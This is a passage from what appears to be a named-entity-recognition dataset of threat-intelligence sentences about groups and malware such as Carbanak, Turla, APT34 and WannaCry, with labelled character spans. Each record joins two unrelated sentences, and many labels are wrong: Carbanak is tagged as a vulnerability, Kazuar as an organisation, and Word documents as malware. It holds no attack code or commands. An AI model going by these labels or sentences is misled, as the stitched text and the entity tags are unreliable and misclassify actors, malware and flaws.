Japanese product used to manage an organization . 
Thrip 's motive is likely espionage and its targets include those in the communications , geospatial imaging , and defense sectors , both in the United States and Southeast Asia .", "spans": [{"start": 39, "end": 50, "label": "Organization"}, {"start": 62, "end": 75, "label": "Organization"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 315, "end": 329, "label": "Organization"}, {"start": 332, "end": 350, "label": "Organization"}, {"start": 357, "end": 372, "label": "Organization"}]} {"text": "While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . One big unknown was the infection vector for Turla ( aka Snake or Uroburos ) .", "spans": [{"start": 39, "end": 50, "label": "Organization"}, {"start": 82, "end": 95, "label": "Organization"}, {"start": 162, "end": 175, "label": "Vulnerability"}, {"start": 307, "end": 312, "label": "Organization"}, {"start": 319, "end": 324, "label": "Organization"}, {"start": 328, "end": 336, "label": "Organization"}]} {"text": "Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . The mothership server is generally a VPS , which runs the Control panel software used to interact with the victims .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 51, "end": 58, "label": "System"}, {"start": 76, "end": 85, "label": "Organization"}, {"start": 195, "end": 198, "label": "System"}]} {"text": "If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . 
the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated .", "spans": [{"start": 32, "end": 40, "label": "Vulnerability"}, {"start": 209, "end": 222, "label": "Vulnerability"}, {"start": 301, "end": 314, "label": "Vulnerability"}, {"start": 315, "end": 318, "label": "System"}, {"start": 319, "end": 326, "label": "Vulnerability"}]} {"text": "To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . Once a victim is confirmed as \" interesting \" , the attackers upload another Epic backdoor which has a unique ID used to control this specific victim .", "spans": [{"start": 57, "end": 80, "label": "System"}, {"start": 83, "end": 86, "label": "System"}, {"start": 91, "end": 99, "label": "Vulnerability"}, {"start": 227, "end": 240, "label": "Malware"}]} {"text": "Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system . Our analysis indicates this is a sophisticated multi-stage infection ; which begins with Epic Turla .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 234, "end": 244, "label": "Malware"}]} {"text": "Sensitive bank documents have be found on the servers that were controlling Carbanak . this attack against a Kaspersky Lab user on August 5 , 2014 .", "spans": [{"start": 76, "end": 84, "label": "Vulnerability"}, {"start": 109, "end": 122, "label": "Organization"}]} {"text": "Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa . 
VENOMOUS BEAR is an advanced , Russia-based adversary that's been active since at least 2004 .", "spans": [{"start": 38, "end": 46, "label": "Vulnerability"}, {"start": 47, "end": 56, "label": "Organization"}, {"start": 172, "end": 185, "label": "Organization"}]} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . Venomous Bear has deployed malware to targets using several novel methods .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 199, "end": 212, "label": "Organization"}]} {"text": "This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies . For years , Turla has relied , among other impersonations , on fake Flash installers to compromise victims .", "spans": [{"start": 72, "end": 80, "label": "Vulnerability"}, {"start": 97, "end": 115, "label": "Organization"}, {"start": 126, "end": 143, "label": "Organization"}, {"start": 146, "end": 161, "label": "Organization"}, {"start": 166, "end": 178, "label": "Organization"}, {"start": 193, "end": 198, "label": "Organization"}, {"start": 244, "end": 265, "label": "Malware"}]} {"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . 
Turla merely uses the Adobe brand to trick users into downloading the malware .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 176, "end": 183, "label": "System"}, {"start": 186, "end": 191, "label": "Organization"}]} {"text": "From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . By looking at our telemetry , we found evidence that Turla installers were exfiltrating information to get.adobe.com URLs since at least July 2016 .", "spans": [{"start": 10, "end": 18, "label": "Vulnerability"}, {"start": 55, "end": 60, "label": "Organization"}, {"start": 65, "end": 83, "label": "Organization"}, {"start": 125, "end": 130, "label": "Organization"}, {"start": 186, "end": 191, "label": "Organization"}]} {"text": "Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems . Thus , it is clear they are trying to be as stealthy as possible by hiding in the network traffic of the targeted organizations .", "spans": [{"start": 11, "end": 19, "label": "Vulnerability"}, {"start": 79, "end": 84, "label": "Organization"}, {"start": 91, "end": 106, "label": "Organization"}]} {"text": "To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer . 
Finally , some of the victims are also infected with other Turla-related malware such as ComRAT or Gazer .", "spans": [{"start": 71, "end": 79, "label": "Vulnerability"}, {"start": 174, "end": 184, "label": "System"}, {"start": 189, "end": 200, "label": "System"}, {"start": 262, "end": 275, "label": "Organization"}, {"start": 276, "end": 283, "label": "Malware"}, {"start": 292, "end": 298, "label": "Malware"}, {"start": 302, "end": 307, "label": "Malware"}]} {"text": "Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research . Kaspersky Lab documented this behavior in 2014 .", "spans": [{"start": 28, "end": 36, "label": "Vulnerability"}, {"start": 70, "end": 75, "label": "Organization"}, {"start": 193, "end": 206, "label": "Organization"}]} {"text": "These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider . It is not a new tactic for Turla to rely on fake Flash installers to try to trick the user to install one of their backdoors .", "spans": [{"start": 28, "end": 43, "label": "Organization"}, {"start": 104, "end": 112, "label": "Organization"}, {"start": 148, "end": 156, "label": "Vulnerability"}, {"start": 174, "end": 195, "label": "Organization"}, {"start": 208, "end": 221, "label": "Organization"}, {"start": 251, "end": 256, "label": "Organization"}, {"start": 268, "end": 289, "label": "Malware"}]} {"text": "The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police . 
Turla operators could use an already-compromised machine in the network of the victim 's organization to perform a local MitM attack .", "spans": [{"start": 18, "end": 28, "label": "Organization"}, {"start": 40, "end": 48, "label": "Vulnerability"}, {"start": 97, "end": 119, "label": "Organization"}, {"start": 243, "end": 248, "label": "Organization"}]} {"text": "Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt . Our January 2018 white paper was the first public analysis of a Turla campaign called Mosquito .", "spans": [{"start": 17, "end": 32, "label": "Organization"}, {"start": 58, "end": 63, "label": "Organization"}, {"start": 66, "end": 75, "label": "Organization"}, {"start": 88, "end": 110, "label": "Organization"}, {"start": 160, "end": 168, "label": "Vulnerability"}, {"start": 173, "end": 179, "label": "System"}]} {"text": "Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent . It is not the first time Turla has used generic tools .", "spans": [{"start": 31, "end": 42, "label": "Organization"}, {"start": 47, "end": 57, "label": "System"}, {"start": 180, "end": 188, "label": "System"}, {"start": 255, "end": 261, "label": "System"}, {"start": 266, "end": 276, "label": "System"}, {"start": 339, "end": 344, "label": "Organization"}, {"start": 354, "end": 367, "label": "Malware"}]} {"text": "Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries . 
In the past , we have seen the group using open-source password dumpers such as Mimikatz .", "spans": [{"start": 75, "end": 83, "label": "Vulnerability"}, {"start": 88, "end": 107, "label": "Organization"}, {"start": 209, "end": 231, "label": "Organization"}, {"start": 302, "end": 330, "label": "Malware"}, {"start": 339, "end": 347, "label": "Malware"}]} {"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . Starting in March 2018 , we observed a significant change in the campaign : it now leverages the open source exploitation framework Metasploit before dropping the custom Mosquito backdoor .", "spans": [{"start": 50, "end": 54, "label": "Organization"}, {"start": 88, "end": 96, "label": "Vulnerability"}, {"start": 270, "end": 280, "label": "Malware"}]} {"text": "In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company . Even an experienced user can be fooled by downloading a malicious file that is apparently from adobe.com , since the URL and the IP address correspond to Adobe 's legitimate infrastructure .", "spans": [{"start": 29, "end": 37, "label": "Vulnerability"}, {"start": 68, "end": 89, "label": "Organization"}, {"start": 242, "end": 256, "label": "Indicator"}, {"start": 315, "end": 317, "label": "Indicator"}]} {"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . 
However , to our knowledge , this is the first time Turla has used Metasploit as a first stage backdoor , instead of relying on one of its own tools such as Skipper .", "spans": [{"start": 64, "end": 88, "label": "Malware"}, {"start": 100, "end": 113, "label": "Vulnerability"}, {"start": 168, "end": 173, "label": "Organization"}, {"start": 183, "end": 193, "label": "Malware"}, {"start": 273, "end": 280, "label": "Malware"}]} {"text": "Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . Traffic was intercepted on a node between the end machine and the Adobe servers , allowing Turla 's operators to replace the legitimate Flash executable with a trojanized version .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 30, "end": 57, "label": "Vulnerability"}, {"start": 60, "end": 73, "label": "Vulnerability"}, {"start": 119, "end": 133, "label": "Malware"}, {"start": 136, "end": 149, "label": "Vulnerability"}, {"start": 156, "end": 172, "label": "System"}, {"start": 175, "end": 188, "label": "Vulnerability"}, {"start": 284, "end": 289, "label": "Organization"}]} {"text": "While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 . At the beginning of March 2018 , as part of our regular tracking of Turla 's activities , we observed some changes in the Mosquito campaign .", "spans": [{"start": 147, "end": 160, "label": "Vulnerability"}, {"start": 163, "end": 176, "label": "Vulnerability"}, {"start": 183, "end": 196, "label": "Vulnerability"}, {"start": 267, "end": 272, "label": "Organization"}]} {"text": "The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant . 
In this post , we have presented the evolutions of the Turla Mosquito campaign over the last few months .", "spans": [{"start": 39, "end": 52, "label": "Vulnerability"}, {"start": 65, "end": 73, "label": "Organization"}]} {"text": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . Primary targets for this adversary are in the government , aerospace , NGO , defense , cryptology and education sectors .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 19, "end": 32, "label": "Vulnerability"}, {"start": 164, "end": 174, "label": "Organization"}, {"start": 177, "end": 186, "label": "Organization"}, {"start": 189, "end": 192, "label": "Organization"}, {"start": 195, "end": 202, "label": "Organization"}, {"start": 205, "end": 215, "label": "Organization"}, {"start": 220, "end": 237, "label": "Organization"}]} {"text": "WannaCry utilizes EternalBlue by crafting a custom SMB session request with hard-coded values based on the target system . Turla 's campaign still relies on a fake Flash installer but , instead of directly dropping the two malicious DLLs , it executes a Metasploit shellcode and drops , or downloads from Google Drive , a legitimate Flash installer .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 18, "end": 29, "label": "Vulnerability"}, {"start": 51, "end": 54, "label": "System"}, {"start": 123, "end": 128, "label": "Organization"}, {"start": 164, "end": 169, "label": "System"}, {"start": 254, "end": 284, "label": "Malware"}, {"start": 333, "end": 338, "label": "System"}]} {"text": "WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 . 
The Turla espionage group has been targeting various institutions for many years .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 44, "end": 55, "label": "Vulnerability"}, {"start": 85, "end": 99, "label": "Organization"}, {"start": 125, "end": 130, "label": "Organization"}]} {"text": "Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 . Recently , we found several new versions of Carbon , a second stage backdoor in the Turla group arsenal .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 24, "end": 45, "label": "Vulnerability"}, {"start": 138, "end": 144, "label": "Malware"}, {"start": 178, "end": 183, "label": "Organization"}]} {"text": "The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April . The Turla group is known to be painstaking and work in stages , first doing reconnaissance on their victims' systems before deploying their most sophisticated tools such as Carbon .", "spans": [{"start": 22, "end": 35, "label": "Vulnerability"}, {"start": 79, "end": 93, "label": "Organization"}, {"start": 94, "end": 106, "label": "Organization"}, {"start": 122, "end": 127, "label": "Organization"}, {"start": 291, "end": 297, "label": "Malware"}]} {"text": "If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit . Kaspersky APT Intelligence Reporting subscription , customers received an update in mid-February 2017 .", "spans": [{"start": 7, "end": 28, "label": "System"}, {"start": 55, "end": 63, "label": "System"}, {"start": 108, "end": 133, "label": "Vulnerability"}, {"start": 136, "end": 185, "label": "Organization"}]} {"text": "Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft . 
Like previous Turla activity , WhiteBear leverages compromised websites and hijacked satellite connections for command and control ( C2 ) infrastructure .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 124, "end": 143, "label": "Vulnerability"}, {"start": 157, "end": 166, "label": "Organization"}, {"start": 200, "end": 209, "label": "Malware"}, {"start": 302, "end": 304, "label": "System"}]} {"text": "The EternalBlue exploit from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 . WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report \" Skipper Turla \u2013 the White Atlas framework \" from mid-2016 .", "spans": [{"start": 4, "end": 23, "label": "Vulnerability"}, {"start": 137, "end": 142, "label": "System"}, {"start": 145, "end": 153, "label": "System"}, {"start": 169, "end": 178, "label": "Malware"}, {"start": 224, "end": 237, "label": "Malware"}, {"start": 310, "end": 323, "label": "Malware"}, {"start": 330, "end": 341, "label": "Malware"}]} {"text": "The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers . However , despite the similarities to previous Turla campaigns , we believe that WhiteBear is a distinct project with a separate focus .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 14, "end": 23, "label": "Organization"}, {"start": 28, "end": 39, "label": "Vulnerability"}, {"start": 207, "end": 216, "label": "Malware"}]} {"text": "Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address . 
From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 35, "end": 44, "label": "Organization"}, {"start": 61, "end": 85, "label": "Vulnerability"}, {"start": 88, "end": 101, "label": "Vulnerability"}, {"start": 222, "end": 231, "label": "Organization"}]} {"text": "The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign . Continued WhiteBear activity later shifted to include defense-related organizations into June 2017 .", "spans": [{"start": 26, "end": 39, "label": "Vulnerability"}, {"start": 169, "end": 198, "label": "Organization"}]} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 49, "end": 68, "label": "Malware"}, {"start": 90, "end": 99, "label": "Malware"}, {"start": 124, "end": 133, "label": "Organization"}]} {"text": "The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years . Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 59, "end": 72, "label": "Vulnerability"}, {"start": 115, "end": 120, "label": "Organization"}, {"start": 189, "end": 195, "label": "System"}, {"start": 208, "end": 235, "label": "Organization"}]} {"text": "Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack . 
Our investigation also led to the discovery of dozens of email addresses registered by Turla operators for this campaign and used to receive exfiltrated data from the victims .", "spans": [{"start": 14, "end": 33, "label": "Organization"}, {"start": 60, "end": 79, "label": "Vulnerability"}, {"start": 195, "end": 200, "label": "System"}, {"start": 225, "end": 230, "label": "Organization"}]} {"text": "The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit . It mainly targets Microsoft Outlook , a widely used mail client , but also targets The Bat! , a mail client very popular in Eastern Europe .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 41, "end": 53, "label": "Vulnerability"}, {"start": 56, "end": 83, "label": "Vulnerability"}, {"start": 101, "end": 114, "label": "Vulnerability"}, {"start": 115, "end": 128, "label": "Vulnerability"}, {"start": 175, "end": 188, "label": "System"}, {"start": 215, "end": 224, "label": "Organization"}, {"start": 225, "end": 232, "label": "System"}]} {"text": "While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well . 
First , Turla steals emails by forwarding all outgoing emails to the attackers .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 67, "end": 80, "label": "Vulnerability"}, {"start": 104, "end": 117, "label": "Organization"}, {"start": 190, "end": 195, "label": "Organization"}, {"start": 203, "end": 209, "label": "System"}, {"start": 237, "end": 243, "label": "System"}]} {"text": "To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103.236.150.14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability . We identified several European governments and defense companies compromised with this group .", "spans": [{"start": 239, "end": 253, "label": "Vulnerability"}, {"start": 292, "end": 312, "label": "Organization"}, {"start": 317, "end": 334, "label": "Organization"}]} {"text": "The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign . What actually happens is that the malware is able to decode data from the PDF documents and interpret it as commands for the backdoor .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 144, "end": 152, "label": "System"}, {"start": 288, "end": 301, "label": "Malware"}]} {"text": "Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . 
In early 2018 , multiple media claimed that Turla operators used mail attachments to control infected machines .", "spans": [{"start": 21, "end": 45, "label": "Malware"}, {"start": 74, "end": 138, "label": "Vulnerability"}, {"start": 150, "end": 163, "label": "Vulnerability"}, {"start": 191, "end": 196, "label": "Organization"}, {"start": 210, "end": 215, "label": "Organization"}]} {"text": "Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild . As detailed in the previous section , this malware is able to manipulate and exfiltrate emails .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 35, "end": 48, "label": "Vulnerability"}, {"start": 180, "end": 186, "label": "System"}]} {"text": "Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 . To our knowledge , Turla is the only espionage group that currently uses a backdoor entirely controlled by emails , and more specifically via PDF attachments .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 40, "end": 53, "label": "Vulnerability"}, {"start": 86, "end": 101, "label": "System"}, {"start": 150, "end": 155, "label": "Organization"}, {"start": 238, "end": 244, "label": "System"}, {"start": 273, "end": 288, "label": "Malware"}]} {"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . The attackers first infected in March 2017 .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 41, "end": 49, "label": "Malware"}, {"start": 65, "end": 78, "label": "Vulnerability"}]} {"text": "In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . 
Our research shows that compromised organizations are at risk of not only being spied on by the Turla group who planted the backdoor , but also by other attackers .", "spans": [{"start": 19, "end": 24, "label": "Organization"}, {"start": 39, "end": 69, "label": "Vulnerability"}, {"start": 70, "end": 84, "label": "Vulnerability"}, {"start": 95, "end": 103, "label": "System"}, {"start": 108, "end": 119, "label": "System"}, {"start": 143, "end": 152, "label": "Organization"}, {"start": 266, "end": 271, "label": "Organization"}]} {"text": "PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . The developers refer to this tool by the name Kazuar , which is a Trojan written using the Microsoft.NET Framework that offers actors complete access to compromised systems targeted by its operator .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 96, "end": 115, "label": "Organization"}, {"start": 118, "end": 137, "label": "Organization"}, {"start": 208, "end": 217, "label": "Organization"}, {"start": 225, "end": 247, "label": "Vulnerability"}, {"start": 266, "end": 270, "label": "System"}, {"start": 327, "end": 333, "label": "Malware"}, {"start": 347, "end": 353, "label": "Malware"}]} {"text": "Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others . 
We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe .", "spans": [{"start": 16, "end": 20, "label": "System"}, {"start": 42, "end": 58, "label": "Vulnerability"}, {"start": 230, "end": 241, "label": "Malware"}, {"start": 263, "end": 268, "label": "Organization"}, {"start": 304, "end": 312, "label": "Organization"}, {"start": 317, "end": 322, "label": "Organization"}, {"start": 370, "end": 379, "label": "Organization"}, {"start": 382, "end": 401, "label": "Organization"}, {"start": 404, "end": 428, "label": "Organization"}, {"start": 435, "end": 457, "label": "Organization"}]} {"text": "It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 . This is also a full-featured backdoor controlled by email , and which can work independently of any other Turla component .", "spans": [{"start": 27, "end": 40, "label": "System"}, {"start": 43, "end": 56, "label": "Vulnerability"}, {"start": 172, "end": 194, "label": "Malware"}, {"start": 263, "end": 268, "label": "Organization"}]} {"text": "This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . 
A hallmark of Turla operations is iterations of their tools and code lineage in Kazuar can be traced back to at least 2005 .", "spans": [{"start": 5, "end": 18, "label": "Malware"}, {"start": 68, "end": 81, "label": "Malware"}, {"start": 102, "end": 115, "label": "Vulnerability"}, {"start": 287, "end": 292, "label": "Organization"}, {"start": 353, "end": 359, "label": "Malware"}]} {"text": "PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched . If the hypothesis is correct and the Turla threat group is using Kazuar , we believe they may be using it as a replacement for Carbon and its derivatives .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 15, "end": 24, "label": "Organization"}, {"start": 50, "end": 63, "label": "Vulnerability"}, {"start": 195, "end": 200, "label": "Organization"}, {"start": 223, "end": 229, "label": "Malware"}, {"start": 285, "end": 291, "label": "Malware"}]} {"text": "PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload . We used a combination of tools such as NoFuserEx , ConfuserEx Fixer , ConfuserEx Switch Killer , and de4d0t in order to deobfuscate the code for in depth analysis .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 15, "end": 24, "label": "Organization"}, {"start": 37, "end": 53, "label": "Vulnerability"}, {"start": 146, "end": 155, "label": "Malware"}, {"start": 158, "end": 174, "label": "Malware"}, {"start": 177, "end": 201, "label": "Malware"}, {"start": 208, "end": 214, "label": "Malware"}]} {"text": "NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence . 
Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \" [username]=>singleton-instance-mutex \" .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 35, "end": 48, "label": "Vulnerability"}, {"start": 67, "end": 77, "label": "Organization"}, {"start": 147, "end": 153, "label": "Organization"}]} {"text": "In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown . The subject is a series of targeted attacks against private companies .", "spans": [{"start": 39, "end": 54, "label": "Organization"}, {"start": 57, "end": 67, "label": "Organization"}, {"start": 72, "end": 81, "label": "Organization"}, {"start": 140, "end": 155, "label": "Vulnerability"}, {"start": 255, "end": 272, "label": "Organization"}]} {"text": "The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . e uncovered the activity of a hacking group which has Chinese origins .", "spans": [{"start": 19, "end": 31, "label": "Organization"}, {"start": 60, "end": 70, "label": "Organization"}, {"start": 73, "end": 82, "label": "Organization"}, {"start": 93, "end": 98, "label": "Organization"}, {"start": 116, "end": 157, "label": "Vulnerability"}, {"start": 160, "end": 173, "label": "Vulnerability"}, {"start": 220, "end": 226, "label": "System"}]} {"text": "The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 . 
Also , by creating this type of API access , Turla could use one accessible server as a single point to dump data to and exfiltrate data from .", "spans": [{"start": 17, "end": 26, "label": "Organization"}, {"start": 52, "end": 68, "label": "Vulnerability"}, {"start": 77, "end": 87, "label": "Organization"}, {"start": 187, "end": 192, "label": "Organization"}]} {"text": "Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . According to our estimations , this group has been active for several years and specializes in cyberattacks against the online video game industry .", "spans": [{"start": 23, "end": 32, "label": "Organization"}, {"start": 52, "end": 66, "label": "Vulnerability"}, {"start": 87, "end": 94, "label": "Organization"}, {"start": 107, "end": 115, "label": "Organization"}, {"start": 141, "end": 171, "label": "Vulnerability"}, {"start": 184, "end": 207, "label": "Organization"}, {"start": 349, "end": 375, "label": "Organization"}]} {"text": "The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . Based on our analysis , we believe that threat actors may compile Windows and Unix based payloads using the same code to deploy Kazuar against both platforms .", "spans": [{"start": 43, "end": 52, "label": "Malware"}, {"start": 68, "end": 81, "label": "Vulnerability"}, {"start": 150, "end": 157, "label": "System"}, {"start": 212, "end": 218, "label": "Organization"}]} {"text": "In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER . 
The group 's main objective is to steal source codes .", "spans": [{"start": 26, "end": 31, "label": "Organization"}, {"start": 53, "end": 83, "label": "Vulnerability"}, {"start": 84, "end": 98, "label": "Vulnerability"}, {"start": 109, "end": 117, "label": "System"}, {"start": 122, "end": 133, "label": "System"}]} {"text": "During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East . In 2010 HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers \u2013 an American video game company .", "spans": [{"start": 29, "end": 34, "label": "Organization"}, {"start": 125, "end": 138, "label": "Vulnerability"}, {"start": 143, "end": 157, "label": "Vulnerability"}, {"start": 213, "end": 219, "label": "Organization"}, {"start": 281, "end": 287, "label": "Malware"}, {"start": 304, "end": 310, "label": "Organization"}, {"start": 329, "end": 356, "label": "Organization"}]} {"text": "In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . 
